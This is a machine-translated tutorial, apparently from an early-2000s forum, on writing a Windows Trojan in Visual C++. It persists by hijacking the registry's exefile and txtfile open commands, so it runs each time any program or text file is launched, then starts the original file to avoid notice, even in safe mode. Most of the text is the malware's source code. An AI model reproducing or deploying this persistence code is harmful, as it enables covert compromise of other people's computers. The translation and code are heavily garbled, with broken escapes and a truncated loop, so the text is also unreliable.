We know that it is necessary to write the program in the registry in the normal startup process.
HKEY_CURRENT_USER / SOFTWARE / Microsoft / Windows / CurrentVersion / Run
HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / RUN
HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / RunService
In the environment, because this value is more familiar, it is easy to be isolated, and the program will enter the Windows protection mode that these programs will not run, but if we put our program in the registry, it has received it very much. good result.
The value in the registry hkey_classes_root / exec / shell / open / command is the association of executable program * .exe file, default ""% 1 "% *", if this program is changed to our Trojan, That way, every executable program will execute our programs without performing the original procedure, so our Trojans will start, the work we have to do is after our Trojan started, then execute the original The procedure, so that it doesn't have anything to see what the general person is. Well, I am not as good as action, let's start doing it.
l First use VC to establish a dialog-based program SRART
Add public variables in cstartdlg Handle Hmutex; prevent our Trojans from running multiple times.
l Add to the following functions in cstartdlg :: OnNIndIalog ():
CString Str;
Str.Format ("% s", AFXGetApp () -> m_lpcmdline); // Get incoming command line parameters
Const char * mutexObject = "mystart"; // Establish a mutex
HMutex = null;
HMutex = :: Createmutex (false, false, mutexObject);
IF (hmutex! = NULL)
{
DWORD ERR = getLastError ();
IF (err == error_already_exists) :: postquitMessage (0); // If the same program is found, exit
}
IF (STR! = "")
{
CSTRING TEMP;
CHAR CH;
INT length = str.getlength ();
For (INT i = 0; I { CH = Str.getat (i); IF (CH == '//') TEMP = TEMP "" ELSE TEMP = TEMP CH; } Temp = temp.Left (Temp.getLength () - 2); Temp = Temp.mid (1); // The above function is to change all "/" in the string "//" CHAR STR1 [] = "/"% 1 / "% *"; :: RegSetValue (HKEY_CLASS_ROOT, "EXEFILE // shell // Open // Command", REG_SZ, (LPCTSTR) STR1, STRLEN (STR1) 1); // You must recover the registry before performing the original program, otherwise use shellexecute or performs our Trojan. Shellexecute (NULL, "Open", TEMP, NULL, NULL, SW_SHOW); // Explore the original program} // After the program is executed, change the registry to the Trojan we want to start. TCHAR STR2 [256]; // Get the name of the program full path GetModuleFileName (NULL, STR2, 255); STRCAT (STR2, "/"% 1 / "% *"); :: RegSetValue (HKEY_CLASS_ROOT, "EXEFILE // shell // Open // Command", REG_SZ, (LPCTSTR) STR2, STRLEN (STR2) 1); // If the above process, as long as the program runs, we will perform our START program. Even in safe mode, you will run our program as long as you execute the executable. Similarly we can also associate additional files, such as re-adding text files in cstartdlg :: onInitDialog () CString Str; Str.Format ("% s", AFXGetApp () -> m_lpcmdline); // Get incoming command line parameters Const char * mutexObject = "mystart"; // Establish a mutex HMutex = null; HMutex = :: Createmutex (false, false, mutexObject); IF (hmutex! = NULL) { DWORD ERR = getLastError (); IF (err == error_already_exists) :: postquitMessage (0); // If the same program is found, exit } IF (Str.Find ("txt")! = - 1) { CSTRING TEMP; CHAR CH; INT length = str.getlength (); For (INT i = 0; I { CH = Str.getat (i); IF (CH == '//') TEMP = TEMP "" ELSE TEMP = TEMP CH; } Temp = temp.Left (Temp.getLength () - 2); Temp = Temp.mid (1); // The above function is to change "/" in the string "//" CHAR STR1 [] = "/"% 1 / "% *"; // You must recover the registry before performing the original program, otherwise use shellexecute or performs our Trojan. Shellexecute (NULL, "Open", "NOTEPAD.exe", TEMP, NULL, SW_SHOW; // Explore the original program } // After the program is executed, change the registry to the Trojan we want to start. TCHAR STR2 [256]; // Get the name of the program full path GetModuleFileName (NULL, STR2, 255); STRCAT (STR2, "/"% 1 / "% *"); :: regSetValue (hkey_classes_root, "txtfile // shell // Open // command", REG_SZ, (LPCTSTR) STR2, STRLEN (STR2) 1); // If the above process, as long as the program runs, we will perform our START program. Of course, these programs can be restored after running on their own machines or restore them. Char str2 [] = "notepad.exe% 1"; :: regsetValue (hkey_classes_root, "txtfile // shell // Open // command", REG_SZ, (LPCTSTR) STR2, STRLEN (STR2) 1); CHAR STR1 [] = "/"% 1 / "% *"; :: RegSetValue (HKEY_CLASS_ROOT, "EXEFILE // shell // Open // Command", REG_SZ, (LPCTSTR) STR1, STRLEN (STR1) 1); Of course, this program runs fine in Win98, can't open the folder on the desktop under Win2000, and there is no problem. If you know, please tell me, Sunyuzhe@263.net
